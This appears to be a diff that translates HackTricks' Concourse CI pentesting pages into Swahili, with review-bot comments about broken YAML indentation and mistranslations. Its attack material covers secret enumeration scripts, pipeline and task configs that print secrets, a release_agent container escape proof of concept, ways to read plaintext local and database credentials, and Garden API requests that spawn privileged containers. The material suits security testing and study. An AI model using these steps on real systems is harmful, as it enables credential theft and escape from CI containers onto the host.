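Review bot: the static vars YAML lost its indentation and is no longer valid YAML: after the root sequence item `- task: unit-1.13`, the keys `file:` and `vars:` at column 0 are a syntax error rather than fields of that task. Keep the original indent:
```
- task: unit-1.13
  file: booklit/ci/unit.yml
  vars: { tag: 1.13 }
```
The role names `owner`, `member`, `pipeline-operator` and `viewer` are also the literal RBAC identifiers Concourse uses (for example in `fly set-team` configuration), so translating them to `mwenye`, `mwanachama`, `mpangaji-mchakato`, `mtazamaji` in the list and the note breaks the mapping to the docs; keep them as code and translate only the descriptions. Minor: `Hii jukumu` should be `Jukumu hili`, and `kuunda timu nyingine` (create) is narrower than the source's "configure".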
@@ -43,82 +41,80 @@ Or using the following `fly` **arguments**:
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
-#### Credential Management
+#### Usimamizi wa Akida
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
+Kuna njia tofauti ambazo **Msimamizi wa Akida unaweza kufafanuliwa** katika pipeline, soma jinsi katika [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
+Zaidi ya hayo, Concourse inasaidia wasimamizi wa akida tofauti:
-- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
-- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
-- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
-- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
-- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
-- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
-- [Caching credentials](https://concourse-ci.org/creds-caching.html)
-- [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
-- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
+- [Msimamizi wa akida wa Vault](https://concourse-ci.org/vault-credential-manager.html)
+- [Msimamizi wa akida wa CredHub](https://concourse-ci.org/credhub-credential-manager.html)
+- [Msimamizi wa akida wa AWS SSM](https://concourse-ci.org/aws-ssm-credential-manager.html)
+- [Msimamizi wa akida wa AWS Secrets Manager](https://concourse-ci.org/aws-asm-credential-manager.html)
+- [Msimamizi wa Akida wa Kubernetes](https://concourse-ci.org/kubernetes-credential-manager.html)
+- [Msimamizi wa akida wa Conjur](https://concourse-ci.org/conjur-credential-manager.html)
+- [Kuhifadhi akida](https://concourse-ci.org/creds-caching.html)
+- [Kuficha akida](https://concourse-ci.org/creds-redacting.html)
+- [Kujaribu tena kufikia zilizoshindwa](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
-> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
+> Kumbuka kwamba ikiwa una aina fulani ya **ufikiaji wa kuandika kwa Concourse** unaweza kuunda kazi za **kuondoa siri hizo** kwani Concourse inahitaji kuwa na uwezo wa kuzifikia.
-### Concourse Enumeration
+### Uhesabuji wa Concourse
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
+Ili kuhesabu mazingira ya concourse unahitaji kwanza **kusanya akida halali** au kupata **token iliyothibitishwa** labda katika faili ya usanidi `.flyrc`.
-#### Login and Current User enum
+#### Ingia na Ujumbe wa Sasa
-- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-- Get configured **targets**:
- - `fly targets`
-- Get if the configured **target connection** is still **valid**:
- - `fly -t status`
-- Get **role** of the user against the indicated target:
- - `fly -t userinfo`
+- Ili kuingia unahitaji kujua **kiungo**, **jina la timu** (kawaida ni `main`) na **timu ambayo mtumiaji anahusishwa nayo**:
+- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
+- Pata **malengo** yaliyowekwa:
+- `fly targets`
+- Pata ikiwa **kiungo kilichowekwa** bado ni **halali**:
+- `fly -t status`
+- Pata **jukumu** la mtumiaji dhidi ya lengo lililoonyeshwa:
+- `fly -t userinfo`
> [!NOTE]
-> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
+> Kumbuka kwamba **token ya API** inahifadhiwa katika `$HOME/.flyrc` kwa kawaida, unapoiba mashine unaweza kuipata huko akida.
-#### Teams & Users
+#### Timu & Watumiaji
-- Get a list of the Teams
- - `fly -t teams`
-- Get roles inside team
- - `fly -t get-team -n `
-- Get a list of users
- - `fly -t active-users`
+- Pata orodha ya Timu
+- `fly -t teams`
+- Pata majukumu ndani ya timu
+- `fly -t get-team -n `
+- Pata orodha ya watumiaji
+- `fly -t active-users`
#### Pipelines
-- **List** pipelines:
- - `fly -t pipelines -a`
-- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- - `fly -t get-pipeline -p `
-- Get all pipeline **config declared vars**
- - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
-
+- **Orodha** ya pipelines:
+- `fly -t pipelines -a`
+- **Pata** yaml ya pipeline (**taarifa nyeti** zinaweza kupatikana katika ufafanuzi):
+- `fly -t get-pipeline -p `
+- Pata **mipangilio yote ya pipeline iliyotangazwa**
+- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
+- Pata majina yote ya **siri za pipelines zilizotumika** (ikiwa unaweza kuunda/kubadilisha kazi au kuiba kontena unaweza kuondoa hizo):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
- echo $pipename;
- fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
- echo "";
+echo $pipename;
+fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
+echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
-
#### Containers & Workers
-- List **workers**:
- - `fly -t workers`
-- List **containers**:
- - `fly -t containers`
-- List **builds** (to see what is running):
- - `fly -t builds`
+- Orodha **workers**:
+- `fly -t workers`
+- Orodha **containers**:
+- `fly -t containers`
+- Orodha **builds** (kuona kinachoendelea):
+- `fly -t builds`
### Concourse Attacks
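Review bot: the `fly` command lines were flattened from nested bullets to top-level bullets throughout this hunk, so each command now reads as a separate item rather than the example for the description above it; restore the two-space indent. The heading `Ingia na Ujumbe wa Sasa` means "Login and Current Message" where the source is "Login and Current User enum" (`Mtumiaji wa Sasa`), and `kiungo` (link) is used for both "endpoint" and "target connection". The bash loop body was also dedented; it still runs, but keeping the indent makes the `for` block readable.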
@@ -127,92 +123,85 @@ rm /tmp/secrets.txt
- admin:admin
- test:test
-#### Secrets and params enumeration
+#### Usanidi wa siri na params
-In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
+Katika sehemu iliyopita tuliona jinsi unavyoweza **kupata majina yote ya siri na vars** zinazotumiwa na pipeline. **Vars zinaweza kuwa na taarifa nyeti** na jina la **siri litakuwa muhimu baadaye kujaribu kuiba** hizo.
-#### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using:
+#### Kikao ndani ya container inayokimbia au iliyokimbia hivi karibuni
+Ikiwa una ruhusa za kutosha (**mwanachama au zaidi**) utaweza **kuorodhesha pipelines na roles** na tu kupata **kikao ndani** ya `/` **container** kwa kutumia:
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
+Kwa ruhusa hizi unaweza kuwa na uwezo wa:
-With these permissions you might be able to:
+- **Kuchukua siri** ndani ya **konteina**
+- Jaribu **kutoroka** hadi kwenye node
+- Kuorodhesha/Kutumia vibaya **cloud metadata** endpoint (kutoka kwenye pod na kutoka kwenye node, ikiwa inawezekana)
-- **Steal the secrets** inside the **container**
-- Try to **escape** to the node
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-#### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
+#### Uundaji/Modification wa Pipeline
+Ikiwa una ruhusa za kutosha (**mwanachama au zaidi**) utaweza **kuunda/kubadilisha pipelines mpya.** Angalia mfano huu:
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- echo "$SUPER_SECRET"
- sleep 1000
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+echo "$SUPER_SECRET"
+sleep 1000
+params:
+SUPER_SECRET: ((super.secret))
```
+Kwa **mabadiliko/kuunda** pipeline mpya utaweza:
-With the **modification/creation** of a new pipeline you will be able to:
+- **Kuhujumu** **siri** (kupitia kuzionyesha au kuingia ndani ya kontena na kuendesha `env`)
+- **Kutoroka** hadi **node** (kwa kukupa ruhusa za kutosha - `privileged: true`)
+- Kuorodhesha/Kutumia **cloud metadata** endpoint (kutoka kwenye pod na kutoka kwenye node)
+- **Futa** pipeline iliyoundwa
-- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-- **Delete** created pipeline
-
-#### Execute Custom Task
-
-This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
+#### Teua Kazi Maalum
+Hii ni sawa na njia ya awali lakini badala ya kubadilisha/kuunda pipeline mpya kabisa unaweza **tu kutekeleza kazi maalum** (ambayo labda itakuwa **siri zaidi**):
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
- type: registry-image
- source:
- repository: ubuntu
+type: registry-image
+source:
+repository: ubuntu
run:
- path: sh
- args:
- - -cx
- - |
- env
- sleep 1000
+path: sh
+args:
+- -cx
+- |
+env
+sleep 1000
params:
- SUPER_SECRET: ((super.secret))
+SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
+#### Kutoroka kwenye node kutoka kwa kazi yenye mamlaka
-#### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release_agent to escape with some small modifications:
+Katika sehemu zilizopita tuliona jinsi ya **kutekeleza kazi yenye mamlaka na concourse**. Hii haitatoa ufikiaji sawa kabisa na bendera yenye mamlaka katika kontena la docker. Kwa mfano, huwezi kuona kifaa cha mfumo wa faili cha node katika /dev, hivyo kutoroka kunaweza kuwa "ngumu" zaidi.
+Katika PoC ifuatayo tutatumia release_agent kutoroka na marekebisho madogo:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
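Review bot: the translated pipeline YAML (the `+` lines from `+- name: simple` through `+SUPER_SECRET: ((super.secret))`) has lost all of its leading indentation, so `plan:`, `config:`, `image_resource:`, `source:` and `params:` now sit at column 0 and the block is no longer valid YAML that `fly set-pipeline` would accept; restore the original indentation (`  - name: simple` / `    plan:` / `    - task: simple-task` and so on) and, more generally, exclude fenced code blocks from the translation pass. The heading `+#### Uundaji/Modification wa Pipeline` is only half translated ("Modification" stays in English while the body uses "kubadilisha"), and the blank lines that separated the heading, the paragraph and the fence were dropped, which is a style regression relative to the rest of the file.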
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
-
> [!WARNING]
-> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
+> Kama unavyojua hii ni tu [**kutoroka kwa release_agent wa kawaida**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) tu kubadilisha njia ya cmd katika node
-#### Escaping to the node from a Worker container
-
-A regular release_agent escape with a minor modification is enough for this:
+#### Kutoroka hadi node kutoka kwa kontena la Worker
+Kutoroka kwa release_agent wa kawaida na mabadiliko madogo yanatosha kwa hili:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
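Review bot: `+> Kama unavyojua hii ni tu ...` renders "As you might have noticed" as "As you know", turning an observation into an assertion; "Kama ulivyoweza kuona" keeps the original sense. While this line is being touched, the link target still points at `concourse-security/broken-reference/README.md`, a placeholder path that does not resolve to the release_agent page it is meant to reference; it predates this change but should be fixed rather than carried into the translation. Keep the blank line between the `> [!WARNING]` callout and the following `#### Kutoroka hadi node kutoka kwa kontena la Worker` heading, as the rest of the file does.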
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
+#### Kutoroka kwenye node kutoka kwenye Web container
-#### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
+Hata kama web container ina baadhi ya ulinzi zilizozuiliwa **haifanyi kazi kama container yenye mamlaka ya kawaida** (kwa mfano, huwezi **kuunganisha** na **uwezo** ni **mdogo sana**, hivyo njia zote rahisi za kutoroka kutoka kwenye container hazifai).
+Hata hivyo, inahifadhi **akili za ndani kwa maandiko wazi**:
```bash
cat /concourse-auth/local-users
test:test
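Review bot: `+Hata hivyo, inahifadhi **akili za ndani kwa maandiko wazi**:` mistranslates "local credentials in clear text": "akili" means mind or intelligence, and the very next region of this file uses "akreditivu" for the same concept. Use one term consistently (e.g. "akreditivu za ndani kwa maandishi wazi"). The two removed blank lines around the heading should also be restored so the heading is visually separated from the paragraph above it, matching the layout of the English original.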
@@ -319,11 +304,9 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
+Unaweza kutumia akreditivu hizo ku **ingia kwenye seva ya wavuti** na **kuunda kontena lenye mamlaka na kutoroka hadi kwenye node**.
-You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
+Katika mazingira unaweza pia kupata taarifa za **kufikia postgresql** ambayo concourse inatumia (anwani, **jina la mtumiaji**, **nenosiri** na hifadhidata pamoja na taarifa nyingine):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
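Review bot: in `+Unaweza kutumia akreditivu hizo ku **ingia kwenye seva ya wavuti** ...` the infinitive marker "ku" is cut off from its verb by the bold delimiter, so the rendered text reads "ku ingia"; move the emphasis to wrap the whole verb, i.e. `**kuingia kwenye seva ya wavuti**`. The `-` blank lines between the paragraph and the ```bash fence were dropped here as well; harmless for rendering, but a gratuitous change.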
@@ -344,39 +327,35 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
-
-#### Abusing Garden Service - Not a real Attack
+#### Kutumia Huduma ya Garden - Si Shambulio Halisi
> [!WARNING]
-> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
+> Hizi ni baadhi ya maelezo ya kuvutia kuhusu huduma, lakini kwa sababu inasikiliza tu kwenye localhost, maelezo haya hayataleta athari ambazo hatujashambulia tayari
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
+Kwa default, kila mfanyakazi wa concourse atakuwa akifanya kazi na huduma ya [**Garden**](https://github.com/cloudfoundry/garden) kwenye bandari 7777. Huduma hii inatumika na Mkurugenzi wa Mtandao kuonyesha mfanyakazi **kile anahitaji kutekeleza** (kupakua picha na kuendesha kila kazi). Hii inasikika vizuri kwa mshambuliaji, lakini kuna ulinzi mzuri:
-- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
+- Inapatikana tu **kitaifa** (127..0.0.1) na nadhani wakati mfanyakazi anajiandikisha dhidi ya Mtandao na huduma maalum ya SSH, tunnel inaundwa ili seva ya wavuti iweze **kuzungumza na kila huduma ya Garden** ndani ya kila mfanyakazi.
+- Seva ya wavuti **inasimamia kontena zinazoendesha kila sekunde chache**, na kontena **zisizotarajiwa** zinatolewa. Hivyo ikiwa unataka **kuendesha kontena maalum** unahitaji **kuingilia** kati ya **mawasiliano** kati ya seva ya wavuti na huduma ya garden.
+Wafanyakazi wa Concourse wanaendesha kwa ruhusa za juu za kontena:
```
Container Runtime: docker
Has Namespaces:
- pid: true
- user: false
+pid: true
+user: false
AppArmor Profile: kernel
Capabilities:
- BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
+BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
-
-However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
+Hata hivyo, mbinu kama **kuunganisha** kifaa cha /dev cha node au release_agent **hazitafanya kazi** (kwa sababu kifaa halisi chenye mfumo wa faili wa node hakiwezi kupatikana, ni kifaa cha virtual tu). Hatuwezi kufikia michakato ya node, hivyo kutoroka kutoka kwa node bila exploits za kernel kunakuwa ngumu.
> [!NOTE]
-> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
+> Katika sehemu iliyopita tuliona jinsi ya kutoroka kutoka kwa kontena lenye mamlaka, hivyo ikiwa tunaweza **kutekeleza** amri katika **kontena lenye mamlaka** lililoundwa na **mfanyakazi** **wa sasa**, tunaweza **kutoroka hadi node**.
-Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-
-**Getting inside a running privileged container**
+Kumbuka kwamba nilipokuwa nikicheza na concourse niliona kwamba wakati kontena jipya linazaliwa ili kuendesha kitu, michakato ya kontena inapatikana kutoka kwa kontena la mfanyakazi, hivyo ni kama kontena kuunda kontena jipya ndani yake.
+**Kuingia ndani ya kontena lenye mamlaka linaloendesha**
```bash
# Get current container
curl 127.0.0.1:7777/containers
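Review bot: in the worker-privilege listing, `+pid: true` and `+user: false` have been outdented to column 0, so they no longer read as children of `Has Namespaces:`; this is verbatim tool output and should be left untouched by the translation. In the prose, `+- Inapatikana tu **kitaifa** (127..0.0.1)` translates "exposed locally" as "kitaifa" (nationally), which inverts the meaning; "kwa ndani tu" or "kwenye localhost tu" is what is meant. `+... inatumika na Mkurugenzi wa Mtandao kuonyesha ...` renders "Web master" (the Concourse web node) as "Network Director"; keep the component name, e.g. "nodi ya Web". The pre-existing typo `127..0.0.1` could be corrected to `127.0.0.1` in the same line.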
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
+**Kuunda kontena mpya yenye mamlaka**
-**Creating a new privileged container**
-
-You can very easily create a new container (just run a random UID) and execute something on it:
-
+Unaweza kwa urahisi kuunda kontena mpya (kimbia tu UID isiyo ya kawaida) na kutekeleza kitu ndani yake:
```bash
curl -X POST http://127.0.0.1:7777/containers \
- -H 'Content-Type: application/json' \
- -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
+-H 'Content-Type: application/json' \
+-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
-
-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
-
+Hata hivyo, seva ya wavuti inakagua kila sekunde chache kontena zinazotembea, na ikiwa kontena isiyotarajiwa itagundulika, itafutwa. Kadri mawasiliano yanavyofanyika katika HTTP, unaweza kuingilia mawasiliano ili kuepuka kufutwa kwa kontena zisizotarajiwa:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
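Review bot: the continuation lines of the `wget` and `curl` commands (`+--header='Content-Type:application/json' \`, `+-H 'Content-Type: application/json' \`, `+-d '{"handle":...`) have had their leading spaces stripped. The commands still execute because of the trailing backslashes, but the diff churns code the translation should not touch and leaves the blocks inconsistent with their `-` originals; leave fenced blocks as they were. `+Unaweza kwa urahisi kuunda kontena mpya (kimbia tu UID isiyo ya kawaida)` turns "just run a random UID" into "run an unusual UID"; the intent is an arbitrarily chosen handle, e.g. "tumia handle/UID yoyote ya nasibu".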
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
-
-## References
+## Marejeo
- https://concourse-ci.org/vars.html
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
index 0cc6363a7..9f2223acf 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
@@ -8,19 +8,16 @@
#### With Docker-Compose
-This docker-compose file simplifies the installation to do some tests with concourse:
-
+Hii faili ya docker-compose inarahisisha usakinishaji ili kufanya majaribio na concourse:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
+Unaweza kupakua amri ya `fly` kwa ajili ya OS yako kutoka mtandao katika `127.0.0.1:8080`
-You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
-
-#### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
+#### Kwa Kubernetes (Inapendekezwa)
+Unaweza kwa urahisi kupeleka concourse katika **Kubernetes** (katika **minikube** kwa mfano) kwa kutumia helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
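Review bot: heading translation is inconsistent in this region: `+#### Kwa Kubernetes (Inapendekezwa)` is translated while the sibling `#### With Docker-Compose` (context line above) stays in English; translate both or neither so the section structure reads uniformly. The blank lines removed before the ```bash fences (the `-` lines) do not affect rendering but are unnecessary churn.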
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
-
-After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
-
+Baada ya kuunda mazingira ya concourse, unaweza kuunda siri na kutoa ufikiaji kwa SA inayotembea katika concourse web ili kufikia siri za K8s:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
- name: read-secrets
+name: read-secrets
rules:
- apiGroups: [""]
- resources: ["secrets"]
- verbs: ["get"]
+resources: ["secrets"]
+verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
- name: read-secrets-concourse
+name: read-secrets-concourse
roleRef:
- apiGroup: rbac.authorization.k8s.io
- kind: ClusterRole
- name: read-secrets
+apiGroup: rbac.authorization.k8s.io
+kind: ClusterRole
+name: read-secrets
subjects:
- kind: ServiceAccount
- name: concourse-release-web
- namespace: default
+name: concourse-release-web
+namespace: default
---
apiVersion: v1
kind: Secret
metadata:
- name: super
- namespace: concourse-release-main
+name: super
+namespace: concourse-release-main
type: Opaque
data:
- secret: MWYyZDFlMmU2N2Rm
+secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
-
### Create Pipeline
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
+Pipeline inajumuisha orodha ya [Jobs](https://concourse-ci.org/jobs.html) ambayo ina orodha iliyopangwa ya [Steps](https://concourse-ci.org/steps.html).
### Steps
-Several different type of steps can be used:
+Aina kadhaa tofauti za hatua zinaweza kutumika:
-- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
+- **hatua ya** [**`task` step**](https://concourse-ci.org/task-step.html) **inaendesha** [**task**](https://concourse-ci.org/tasks.html)
+- hatua ya [`get` step](https://concourse-ci.org/get-step.html) inapata [resource](https://concourse-ci.org/resources.html)
+- hatua ya [`put` step](https://concourse-ci.org/put-step.html) inasasisha [resource](https://concourse-ci.org/resources.html)
